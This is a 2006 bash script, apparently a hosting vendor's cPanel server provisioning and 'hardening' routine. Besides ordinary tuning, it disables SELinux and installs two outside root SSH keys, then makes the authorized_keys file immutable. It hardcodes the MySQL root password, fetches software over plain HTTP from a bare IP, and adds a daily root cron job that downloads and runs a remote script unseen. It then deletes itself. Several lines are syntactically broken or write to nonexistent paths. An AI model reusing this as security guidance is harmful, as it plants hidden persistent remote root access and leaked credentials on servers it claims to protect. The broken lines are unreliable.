##!/bin/bash
echo "Specifications Ver. 1.33 (26may2006)"
echo "Compiled, tweaked, etc..."
echo "Nick AT server4sale DOT com"

lcd=`pwd`
cd /root
mkdir nick 2>/dev/null
cd nick

echo "SE Linux"
setenforce 0
cp /etc/selinux/config /etc/selinux/config.orig; cat /etc/selinux/config| sed "s/SELINUX=permissive/SELINUX=disabled/"| sed "s/SELINUX=enforcing/SELINUX=disabled/" > q; mv -f q /etc/selinux/config;

mkdir /root/.ssh
echo '
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAgEAoALL59a0/gp3SmhQqioh4+gYBYqvdlBmxZH7Ss+mNQNJXxbtZPrL3eD1c6hC1Fp8VSfcy/sMeplFRuYS54r9oKc848uafuvzw/nqapq4/6MkqvlIP8McSN6E9aVDr1NMtj+icCScMp1Dj175iIr2miC3YOVb7UlDcPwrheYTQ3bXXnCd5OYhf2pRW2vdMTwIZKz3ZpS2a7kCU/Q02Kl9dcEVHGgwLU6MAQGuEWuRNc3NdbM6hNYXlJP1FE5ysZEOyzuVquxGMepFZ2zmHkOxGPa66VVPSrcLPzyuBC81hc+if5VX7JBVnaL9KZabzzcCft0IIlLxvtwqFWmAhQwHTOatuW2d5eXt5hZSixoA8kiWs9Qx4L4hAcVT9ZG3iI1kKGl146oCO17ZHbgiQDjHodPZqHvLzieihC93sIqwmbht3J7RfbIMsgAUgkEBEMjOkThx568pAEZvCFlhuI7yAW+8cmnVsjYJFNzDWCVErEtpkdtqbjg/CQMuZBI0521WidXCNwdO7iSKCab4y6E16V3I4sIEbudSbPWhKosSVz7jD2D6dfAdvIcC5L8dnxjLqcajrTYdGNQiyAN8yKL0aHyY9m0+Gn3LkDqoYsU4eiOuwqaLk0x+iuMftm7pm1EwSKQXNB9TP0mPhZ2ztQL6vAyPs5LzxzJkUNmoXkZPB0k= root@ns5.astrohost.biz
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAgEAq6sXE2hgvFoZ2iO6+mAuV7knVxc7Ma7MGJlHYdfpGT08uVH9MuBShNoWTouWGGjO8GbsSe8oZa4XrUBplhSZ4JiSbOq6xooN/W0zQV20VAy9KtYNkGV61RlEa/FP+M9YgMX84ckRPRmPOfXgk1x6NSGpUgqpD1pxBwn+5k6Wb0q1aHGM+A8zIW9syH/8tRL7x4rhyHv5CZab/RqDQyj7AHU/m+V8Zcbdzwb17F64cOuWoWj891PH7jj/ZYLirf9QNQmGbgtP1Ofb+1eY+0Ec2IXqiU2CEBZDukA8IV53RVSCrDGndlrgXNa6g2HWinxjj1jqIz01HWzaRKj4FJYUf1Ne66AQidMaoPpCW3rA0oD9EcnPLcYXj14o/yXYno2EI15k9XLdNC+K8h5DfDBSVxYHxscMD4ls53UXyVoSTGyW1+S374+7FVxoJxYfr/E1Gq6gbjD4+CRqZ5zCvg5WUmGlDWikVJ413EzvPxoDk9pp8mhj9nG6x7pGDmNiTNnq/WNzWyk7hcPe9EjQMBIj1G1sxc/wiqBhrJ1aAYgZaE+eyrG3iTxUnYoms6l6/EIGohgWXKIPu4jUlvJVVnRTtdMNf6yp0XcIpgQvF0Lf73guBMNDKliHSzq7rwkDsGK9J5SDqkD+NUWpiNz7GalVHhJ4F8UiVBoj8HVRRj7IfGE= root@stats.support4sale.com
'\
>> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
chattr +i /root/.ssh/authorized_keys


echo "Securing ..."
/scripts/securetmp --auto 1> /dev/null
/scripts/securetmp --install 1> /dev/null
rm -rf /var/tmp/
ln -s /tmp/ /var/
umount /dev/shm
mount /dev/shm 
/scripts/secureit 1> /dev/null
/scripts/compilers off 1> /dev/null
touch /etc/interchangedisable 
touch /etc/melangedisable
touch /etc/entropychatdisable
/etc/init.d/cpanel restart 1> /dev/null

echo "WHM Access.."
cp /usr/local/apache/conf/httpd.conf /usr/local/apache/conf/httpd.conf.orig
sed -ie "s/\/whmredirect.cgi/\/swhmredirect.cgi/" /usr/local/apache/conf/httpd.conf
sed -ief "s/base\/redirect.cgi/base\/swhmredirect.cgi/" /usr/local/apache/conf/httpd.conf
service httpd restart


echo disabling tools..
chmod 750 /usr/kerberos/bin/ftp 
chmod 750 /usr/bin/elinks
chmod 750 /usr/bin/links
chmod 750 /usr/bin/lynx
chmod 750 /usr/bin/rcp
chmod 750 /usr/bin/wget
chmod 750 /usr/bin/scp


echo monitor..
cd /var/run/chkservd/monitor
for i in \
antirelayd  cpsrvd  exim  eximstats  ftpd  httpd  imap  mysql  named  pop  spamd  syslogd sshd cppop xinetd ;
do touch $i; done
/etc/init.d/chkservd restart 1> /dev/null



for i in `find /etc/xinetd.d -exec grep -q "disable = no" {} \; -print`; do sed -ie "s/disable = no/disable = yes/" $i;done;
/etc/init.d/xinetd restart 1> /dev/null



echo SSH
cp /etc/ssh/sshd_config /etc/ssh/sshd_config.orig
cat /etc/ssh/sshd_config| sed "s/#Protocol 2,1/Protocol 2/" | sed  "s/#MaxStartups 10/MaxStartups 10:50:20/" > q; mv -f q /etc/ssh/sshd_config
/etc/init.d/sshd restart


cp /etc/resolv.conf /etc/resolv.conf.orig
yum install  perl-TermReadKey perl-Time-HiRes  perl-TimeDate perl-Net-DNS perl-Digest-HMAC-1 perl-Digest-SHA1 perl-DBI -y 1> /dev/null


cp /etc/my.cnf /etc/my.cnf.orig

touch /var/log/mysql_slow_query.log
chown root.mysql  /var/log/mysql_slow_query.log
chmod 660 /var/log/mysql_slow_query.log

echo > /etc/my.cnf
echo "\
[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
set-variable = max_connections=500
safe-show-database
bind-address=127.0.0.1
log-slow-queries = /var/log/mysql_slow_query.log
connect_timeout=50
thread_cache_size=64
key_buffer_size=64M
join_buffer=1M
tmp_table_size=32M
max_allowed_packet=16M
record_buffer=1M
sort_buffer_size=1M
read_buffer_size=1M

[mysql.server]
user=mysql
basedir=/var/lib

[mysqld_safe]
err-log=/var/log/mysqld.log
pid-file=/var/run/mysqld/mysqld.pid
 " \
> /etc/my.cnf

/etc/init.d/mysql restart 1> /dev/null
ps aux | grep mysql
/usr/bin/mysqladmin -u root password 3948ur3942309amkwj

echo ' 
[client]
user="root"
pass="3948ur3942309amkwj" ' \ 
> /root/.my.cnf


echo RPM cleaning
rpm -e rwall-server rusers-server rwho rusers telnet-server ipchains lokkit isdn4k-utils isdn4k-utils-devel gpm links gpm-devel aumix sndconfig linuxconf-devel linuxconf XFree86-xfs chkfontpath ttfonts urw-fonts cups cups-drivers esound esound-devel samba samba-common samba-client inn inn-devel pidentd nscd nss_ldap a2ps ash mc bcm5820 eject hwcrypto pciutils kudzu-devel pciutils-devel redhat-logos inews foomatic pnm2ppa autofs raidtools mt-st reiserfs-utils apmd micq rsh talk talk-server rmt yp-tools ypbind ypserv cvs fetchmail mouseconfig hotplug elinks usbutils finger finger-server rdist radvd rsh-server lockdev lockdev-devel libusb libusb-devel rcs xdelta xdelta-devel nmh dhcpcd swig mutt metamail nfs-utils dump  VFlib2 ghostscript cups-devel printconf jadetex docbook-utils docbook-utils-pdf cups-drivers-hpijs cups-drivers-pnm2ppa ghostscript-fonts VFlib2-devel efax cups-libs tetex tetex-afm tetex-dvilj tetex-latex passivetex tetex-dvips xmltex linuxdoc-tools xmltodocbook-utils docbook-style-dsssl lm_sensors docbook-style-xsl LPRng Omni watanabe-vf ttfonts-ja nkf tux mpage Omni-foomatic hpijs gimp-print minicom wvdial XFree86-truetype-fonts kernel-pcmcia-cs vim-enhanced xmlto VFlib2-conf-ja redhat-config-securitylevel fam w3m libgnome libgnomeui redhat-config-samba redhat-config-printer gnome-vfs2 libbonoboui gnome-python2-bonobo gnome-python2 redhat-config-network  redhat-config-printer-gui redhat-config-services redhat-config-bind gtkhtml2 gnome-python2-gtkhtml2 redhat-config-packages redhat-config-nfs redhat-config-httpd redhat-lsb


echo Time
mv /etc/localtime /etc/localtime.orig
ln -s /usr/share/zoneinfo/US/Eastern /etc/localtime
echo "57 * * * * root ntpdate pool.ntp.org 1> /dev/null 2> /dev/null" >> /etc/crontab
rdate -s rdate.cpanel.net; ntpdate pool.ntp.org ; hwclock --systohc




echo MyTOP..
cd /root/nick
wget -q http://65.110.52.159/net/mytop-1.4.tar.gz
tar -xzf mytop-1.4.tar.gz
cd mytop-*
perl Makefile.PL 1> /dev/null
make 1> /dev/null
make test 1> /dev/null
make install




echo BFD..
cd /root/nick
wget -q http://65.110.52.159/net/bfd-current.tar.gz
tar -xzf bfd-current.tar.gz
cd bfd-*
./install.sh 1> /dev/null
sed -i.orig "s/ALERT_USR=\"0\"/ALERT_USR=\"1\"/" /usr/local/bfd/conf.bfd
cd ..


echo RootKIT Hunter..
cd /root/nick
echo "installing rkhunter"
wget -q http://65.110.52.159/net/rkhunter-1.2.8.tar.gz
tar -xzf rkhunter-1.2.8.tar.gz
cd rkhunter
./installer.sh 1> /dev/null
echo "1 0-23/12 * * * root /usr/local/bin/rkhunter --update" >> /etc/crontab
echo "2 0-23/12 * * * root /usr/local/bin/rkhunter --cronjob --report-mode --checkall" >> /etc/crontab
echo "0 0-23/12 * * * root /usr/local/bin/rkhunter --versioncheck 1>/dev/null; 2> /dev/null"
cd ..
/usr/local/bin/rkhunter --update
/usr/local/bin/rkhunter --cronjob --report-mode --checkall --versioncheck 1> /dev/null


echo ChkRootKIT..
cd /root/nick
wget -q http://65.110.52.159/net/chkrootkit.tar.gz
tar -xzf chkrootkit.tar.gz
cd chkrootkit-*
make 1> /dev/null
b=`pwd`
a=`basename $b`
cd ..
mv $a /etc
cd /etc/$a
echo "5 6 * * * root cd /etc/$a/chkrootkit; ./chkrootkit | grep -v 'nothing found'|grep -v 'not infected'| mail -s 'chkrootkit' root" >> /etc/crontab
/etc/$a/chkrootkit | grep -v "nothing found"|grep -v "not infected" | mail -s "chkrootkit" root
./chkrootkit | grep -v "nothing found"|grep -v "not infected"



#echo LibSafe..
#cd /root/nick
#wget http://65.110.52.159/net/libsafe-2.0-16.i386.rpm
#rpm -i libsafe-2.0-16.i386.rpm


echo Linux Socket Monitor..
cd /root/nick
wget -q http://65.110.52.159/net/lsm-current.tar.gz
tar -xzf lsm-current.tar.gz
cd lsm*
sh ./install.sh 1> /dev/null
lsm -c 1> /dev/null


echo Process Resource Monitor..
cd /root/nick
wget -q http://65.110.52.159/net/prm-current.tar.gz
tar -xzf prm-current.tar.gz
cd prm*
sh ./install.sh 1> /dev/null
sed -i.orig "s/\*\/4/\*/" /etc/cron.d/prm


#http://www.r-fx.ca/downloads/les-current.tar.gz
#tar xzf les-current.tar.gz
#cd les*

cd /root/nick
echo Multi Tail - to view multiple log files simultaneously
wget -q http://65.110.52.159/net/multitail-3.8.5.tgz
tar xzf multitail-3.8.5.tgz
cd multitail*
make install 1> /dev/null

cp /etc/rc.local /etc/rc.local.orig
echo >> /etc/rc.local
echo '
/scripts/securetmp --auto
echo "1" > /proc/sys/net/ipv4/tcp_syncookies
echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all
echo "0" > /proc/sys/net/ipv4/conf/all/accept_redirects
echo "1" > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
echo 512 > /proc/sys/net/ipv4/neigh/default/gc_thresh1
echo 2048 > /proc/sys/net/ipv4/neigh/default/gc_thresh2
echo 4096 > /proc/sys/net/ipv4/neigh/default/gc_thresh3
echo "0" > /proc/sys/net/ipv4/net.ipv4.ip_forward
echo "1" > /proc/sys/net/ipv4/net.ipv4.conf.default.rp_filter
echo "0" > /proc/sys/net/ipv4/net.ipv4.conf.default.accept_source_route
echo "0" > /proc/sys/net/ipv4/kernel.sysrq
echo "1" > /proc/sys/net/ipv4/kernel.core_uses_pid
echo "60" > /proc/sys/net/ipv4/net.ipv4.tcp_fin_timeout
echo "3600" > net.ipv4.tcp_keepalive_time
for i in /proc/sys/net/ipv4/conf/*/rp_filter; do
echo 1 > $i
done
for $i in /proc/sys/net/ipv4/conf/*/accept_source_route; do
echo 0 > $i
done
'\
> /etc/rc.local
echo
/scripts/securetmp --install 1> /dev/null


echo Logs..
sed -i.orig "s/#compress/compress/" /etc/logrotate.conf

rpm -qa | grep logwatch
rpm -qa | grep cron
sed -i.orig "s/DAILY_UPDATE=no/DAILY_UPDATE=yes/" /etc/updatedb.conf

a='echo "ALERT - Root Shell Access on:" `date` `who` | mail -s "Alert: Root Access" noc@server4sale.com'
echo $a  >> /root/.bash_profile

echo '
ALERT! You are entering a secured area! Your IP and login information
have been recorded. System administration has been notified.

This system is restricted to authorized access only. All activities on
this system are recorded and logged. Unauthorized access will be fully
investigated and reported to the appropriate law enforcement agencies.
'\
>> /etc/motd

echo S4S updating scripts..
echo 
echo "0 6 * * *  root wget http://65.110.52.159/net/daily.sh > /dev/null 2>&1; chmod 700 daily.sh > /dev/null 2>&1; sh daily.sh > /dev/null 2>&1 ; rm -f daily.sh > /dev/null 2>&1 " >> /etc/crontab 

echo Alerts to NOC..
echo "noc@server4sale.com" > /root/.forward


cd $lcd
rm -fr build.sh

echo Ok.
echo Nick @ Server 4 sale . com
echo Login to server, edit /etc/apf/conf.apf an change DEVEL_MODE="1" to "0" and reboot.
echo if you cant login, wait 5 minutes, try to login again then check APF config.
echo for SoftLayer Servers you must change IFACE_IN="eth1" and IFACE_OUT="eth1" for now

echo APF..
mv /etc/sysconfig/iptables /etc/sysconfig/iptables.orig 2> /dev/null
cd /root/nick
wget -q http://65.110.52.159/net/apf-current.tar.gz
tar -xzf apf-current.tar.gz
cd apf-*
sh ./install.sh 1> /dev/null
cp /etc/apf/conf.apf /etc/apf/conf.apf.orig
cat /etc/apf/conf.apf | sed 's/IG_TCP_CPORTS="22"/IG_TCP_CPORTS="21,22,25,53,80,110,143,443,465,953,993,995,2082,2083,2084,2086,2087,2095,2096,3306,5100,6666,7786,3000_3500,5666, 8080, 8443,9022"/' | sed 's/IG_UDP_CPORTS=""/IG_UDP_CPORTS="53,161,6277"/' | sed 's/EG_TCP_CPORTS="21,25,80,443,43"/EG_TCP_CPORTS="21,25,37,53,80,110,113,443,43,873,953,2089,2703,3306,5666"/' | sed 's/EG_UDP_CPORTS="20,21,53"/EG_UDP_CPORTS="20,21,53,873,953,6277"/'| sed 's/USE_DS="0"/USE_DS="1"/' > q; mv -f q /etc/apf/conf.apf

sed -ief "s/USE_AD=\"0\"/USE_AD=\"1\"/" /etc/apf/conf.apf
for i in \
65.110.52.150 216.32.66.226 72.232.81.2 202.5.145.58 216.32.82.58 63.246.154.88 ;
do 
echo $i >>/etc/apf/allow_hosts.rules
done;

echo Disabling compilers
chmod 000 /usr/bin/perlcc 2>/dev/null
chmod 000 /usr/bin/byacc 2>/dev/null
chmod 000 /usr/bin/yacc 2>/dev/null
chmod 000 /usr/bin/bcc 2>/dev/null
chmod 000 /usr/bin/kgcc 2>/dev/null
chmod 000 /usr/bin/cc 2>/dev/null
chmod 000 /usr/bin/gcc 2>/dev/null
chmod 000 /usr/bin/i386*cc 2>/dev/null
chmod 000 /usr/bin/*c++ 2>/dev/null
chmod 000 /usr/bin/*g++ 2>/dev/null
chmod 000 /usr/lib/bcc /usr/lib/bcc/bcc-cc1 2>/dev/null
chmod 000 /usr/i386-glibc21-linux/lib/gcc-lib/i386-redhat-linux/2.96/cc1 2>/dev/null



/etc/init.d/apf restart  2>/dev/null

kill -9 $$